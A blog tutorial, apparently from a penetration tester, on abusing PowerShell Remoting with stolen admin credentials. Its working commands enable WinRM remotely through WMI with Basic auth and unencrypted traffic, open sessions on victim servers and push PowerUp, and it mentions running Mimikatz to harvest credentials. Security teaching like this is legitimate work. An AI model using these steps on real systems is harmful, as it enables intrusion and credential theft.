PowerShell PSRemoting Pwnage

Scenario

You have obtained some level of admin creds, (local, domain or otherwise) to a windows server/domain, there is no RDP. There is however the WinRM service, PSRemoting to give it its other name, this allows an admin to create a remote PowerShell session to the server and run commands or scripts, very much like the ssh service used on Linux systems.
The admin level creds you have will allow you to connect to the remote server(s) via PSRemoting, and you will want to run hacker PowerShell tools in the remote session to further infiltrate the server or systems, however, given the lack of RDP and the locked down state of the network and services, you may struggle to get the likes of PowerSploit onto the remote system.

So for instance we might want to run Invoke-Mimikatz on the remote server to extract clear text credentials stored on the server. Lets explore PSRemoting in a liitle more depth.

Make sure you have enabled PSSRemoting on your attacker system before you continue, below is how to set it up;

Open a PowerShell session as admininstrator
run the following commands

winrm quickconfig

This will enable the winrm service and set up the firewall etc, this is strictly not necessary, but it shows the process.

Next we have to set our system to ‘Trust’ remote hosts for remoting to

Set-Item WSMan:localhost\client\trustedhosts -value *

This command will allow the local system to connect to ANY remote PSSession, the * can be replaced by ip addresses or ranges or hostnames to be a touch more secure if required.

Set-Item WSMan:\localhost\Client\TrustedHosts -Value 'machineA,machineB'

As PSSRemoting is enabled by default on Server 2012 upwards and we have gained some admin creds we can use the Enter-PSSession command, or if no session is available we can create a New-PSSession on the target server. The commands below will achieve this

Enter-PSSession -ComputerName 192.168.0.2 -Credential hackme\admin

Replacing hackme\admin with the domain name and username of the obtained credentials and the ComputerName to the IP address of the victim server.

Or, if a session does not exist we can add a new one

New-PSSession -ComputerName 192.168.0.2 -Credential hackme\admin

And then re-run the Enter-PSSession command

Capture5OK, so we have remote session onto a victim server in the Hackme domain, PSSRemoting is set up for trusted hosts from the local attacker system to connect with the correct credentials.

Enable PS Remoting Remotely

So what if PSRemoting is not enabled on the server or you want to access a Windows 7 workstation, (Windows 8 and 10 can also be remoted into).

This is where the awesome abilities of WMI comes into play, as we have admin level creds we can remotley enable PS Remoting, with the following command

$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName remote-computer -Credential domain\user -ArgumentList $command

psremote-win7-1

Above we’ve enabled PSRemoting on a Windows 7 x64 workstation, and below we’ve created a New-PSSession and Entered the session

psremote-win7-2

Awesome, next we have to get some hacking tools onto the remote box via the remoting session, there’s a PowerShell cmdlet for this too.

Invoke-Command -Session 'session' -Filename 'path to the powershell script'

Where the session arguement is made up as below

$remotesession = New-PSSession -ComputerName $remote -Credential $creden -Name $remote

This allows us to ‘Push’ a script via PSRemoting to the remote system

The screen captures below shows the process, first we create a variable to carry the ‘session’ information, which in turn allows us to ‘Push’ the PowerUp.ps1 module to the remote system.

psremote-win7-3

Next we reconnect to the remote system and run our choice of PowerUp command ‘Invoke-AllChecks’

psremote-win7-4

While this is all cool and fairly staight forward, to ease the leverage of this I’ve written a small PowerShell module to make the process a lot easier.

Invoke-WinRMAttack

The cmdlet is available from my Github – https://github.com/davehardy20/Invoke-WinRMAttack

psremote-win7-5

psremote-win7-6

Simply clone the git repository and import the module into your PowerShell session and fill in the gaps, full help and examples are provided with the module, by issuing

Get-help Invoke-WinRMAttack -Full

A quick example below

psremote-win7-7

If you find any issues or have any feature requests you can get in touch via github and I’ll try to fix any issues and implement requests for features.

I’m also going to add this functionallity into PoshC2 to further its capabilities. PoshC2 can be found here – https://github.com/nettitude/PoshC2https://github.com/nettitude/PoshC2

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s